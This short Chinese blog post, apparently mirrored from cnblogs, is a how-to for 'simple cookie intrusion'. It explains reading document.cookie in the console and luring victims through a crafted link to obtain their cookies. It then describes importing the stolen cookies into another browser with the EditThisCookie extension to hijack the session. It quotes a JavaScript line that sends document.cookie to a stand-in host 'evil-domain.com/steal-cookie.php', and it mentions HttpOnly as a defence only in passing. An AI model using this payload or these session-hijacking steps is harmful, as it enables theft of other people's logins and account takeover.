zoukankan      html  css  js  c++  java
  • 简单cookie入侵

    在当前网站,按下F12键进入开发者模式,在console控制台输入:document.cookie获取cookie值如:

     复制你得到cookie值,你或通过每种方式获取Cookie,例如:当别人点击你的链接时在参数后加&docment.cookie,

    换一个浏览器,打开上面获得cookie的网站并点击EditThisCookie,将相应的key和值加入进去,刷新网页,就可以侵入成功了(注意 Cookie的有效期)

    EditThisCookie是谷歌chrome的扩展插件,可以到Chrome扩展商店下载安装,如果不想翻墙则可以到以下下载完后将解压的文件拖进扩展程序即可:

    https://pan.baidu.com/s/13lrP4aDXfIhCLCn2Fp217Q

    new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
    上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie

  • 相关阅读:
    搭建wamp环境,数据库基础知识
    练习题:选择器和选择好友
    例子:滑动效果
    TCPDump
    内存
    Cache和Buffer的区别(转载)
    经典问题回忆
    history
    DNS
    bc的用法
  • 原文地址:https://www.cnblogs.com/jing-tian/p/10993814.html
Copyright © 2011-2022 走看看